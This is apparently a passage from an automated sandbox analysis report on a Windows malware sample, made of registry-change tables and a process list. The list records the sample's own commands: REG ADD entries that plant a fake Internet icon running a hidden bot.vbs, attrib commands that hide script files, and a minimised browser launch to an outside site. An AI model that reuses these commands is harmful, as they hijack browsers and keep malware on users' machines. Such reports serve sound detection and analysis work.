| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000d95c69122c8541d3d5734b33ee2c73b3199972c1b000734a881642e5c167e6d1000000000e8000000002000020000000124ea807d3e5498e25be90fa5f9f06c2425e5e08a89da6866c2de831413107ba2000000075b32362eab0a167a00516677ecd1815e6b69b1c6d41dcd7891a24f9cd5451ae400000004800225125246914b43ab318bd56f3d20580d8ed767c3e9ba17348ecf15d679a31893afa9e2c0ce4acd4bbfaf9627fb3826c10773a5325fa8fcc46177215efd0 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30d410675c31db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1712909909" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000a151198040e7728ff4d08b878b3ceba851d35e0ad628ef4d5729477ccc7f0303000000000e8000000002000020000000980078381d2d5506e2c9b78377233c9bcbfbfcce47997a1deb8baf7e3fbb7495200000005c937bc29cb5091fdb88a73085103054b52b18f4c7f7119c7ad3de1f19421d8740000000ef485b24ba2f988799828c2a083e2010de15a2f39936ae3cd8a815ac68e50debd495aaf33e4a6c3f9987a316b04dd96582a6dfb3ad88bb30e0f9423c84077108 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{9195284E-9D4F-11EF-ADF2-5227CD58F2D9} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200018675c31db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1710878674" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1712909909" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437780028" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1710878674" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
"C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ha
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ha
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\tool.cmd
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\Microsoft\bot.vbs"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\tool.cmd"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4956 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\open.vbs"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
